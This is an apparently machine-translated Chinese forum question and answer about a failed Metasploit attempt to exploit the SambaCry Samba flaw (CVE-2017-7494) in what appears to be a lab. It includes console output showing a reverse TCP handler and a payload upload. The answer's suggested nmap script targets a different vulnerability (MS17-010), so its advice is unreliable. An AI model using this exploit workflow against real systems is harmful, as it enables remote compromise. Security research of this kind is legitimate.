無法利用使用metasploit的samba cry valnurability

Question

我試圖利用linux內核漏洞samba cry（CVE-2017-7494）進行一些使用metasploit框架的研究工作。但我得到以下錯誤MSF開發（is_known_pipename）>運行

[*] Started reverse TCP handler on 192.168.78.136:4444 
[*] 192.168.78.139:445 - Using location \\192.168.78.139\myshare\ for the 
path# 
[*] 192.168.78.139:445 - Retrieving the remote path of the share 'myshare' 
[*] 192.168.78.139:445 - Share 'myshare' has server-side path '/shared 
[*] 192.168.78.139:445 - Uploaded payload to 
\\192.168.78.139\myshare\BsdRHcSh.so 
[*] 192.168.78.139:445 - Loading the payload from server-side path 
/shared/BsdRHcSh.so using \\PIPE\/shared/BsdRHcSh.so... 
[-] 192.168.78.139:445 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND 
[*] 192.168.78.139:445 - Loading the payload from server-side path 
/shared/BsdRHcSh.so using /shared/BsdRHcSh.so... 
[-] 192.168.78.139:445 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND 
[*] Exploit completed, but no session was created. 

是不是因爲我的目標主機沒有valnurable或任何其他問題？我的目標主機有samba版本 - 3.6.23，據我所知它是可以忍受的。

感謝

Answer 1

無法加載STATUS_OBJECT_NAME_NOT_FOUND的意思是「對象名稱未找到」。 可能metasploit無法上傳共享文件夾中的有效負載。 您可以嘗試執行nmap並驗證是否存在此漏洞？ 該命令是 nmap -p445 --script smb-vuln-ms17-010 TARGET_IP